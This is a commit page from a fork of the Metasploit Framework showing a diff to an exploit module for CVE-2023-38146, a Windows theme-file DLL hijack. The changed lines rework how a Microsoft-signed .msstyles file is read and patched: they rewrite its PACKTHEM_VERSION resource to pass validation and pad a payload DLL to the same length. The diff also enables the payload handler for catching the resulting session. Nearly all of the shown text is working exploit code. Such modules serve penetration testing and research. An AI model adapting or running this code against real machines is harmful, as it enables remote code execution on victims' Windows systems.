dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Bring in zerosteiner's PACKME_VERSION edit

This commit is contained in:
bwatters 2023-12-20 16:46:44 -06:00
parent 95eb4cc304 6f17088e33
commit 7fafab9680
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 11 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
View File

@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
'DisclosureDate' => '2023-09-13', 'DisclosureDate' => '2023-09-13',
'Author' => [ 'Author' => [
'gabe_k', # Discovery/PoC 'gabe_k', # Discovery/PoC
'bwatters-r7' # msf exploit 'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
], ],
'References' => [ 'References' => [
['CVE', '2023-38146'], ['CVE', '2023-38146'],
@ -39,15 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
'Stability' => [CRASH_SAFE], 'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION], 'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
} },
'DefaultOptions' => { 'DisablePayloadHandler' => false }
) )
) )
register_options([ register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]), OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
]) ])
deregister_options( deregister_options(
@ -69,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def primer def primer
legit_dll = File.binread(datastore['MS_SIGNED_DLL']) legit_dll = File.binread(datastore['STYLE_FILE'])
payload_dll = generate_payload_dll payload_dll = generate_payload_dll
max_length = [payload_dll.length, legit_dll.length].max max_length = [payload_dll.length, legit_dll.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger # make sure that the lengths are the same by padding the smaller to the length of the larger
@ -99,7 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
def get_file_contents(client:) def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}") print_status("Sending file to #{client.peerhost}")
File.binread(datastore['MS_VERSION_FILE']) pe_raw = File.binread(datastore['STYLE_FILE'])
pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
end end
def make_theme def make_theme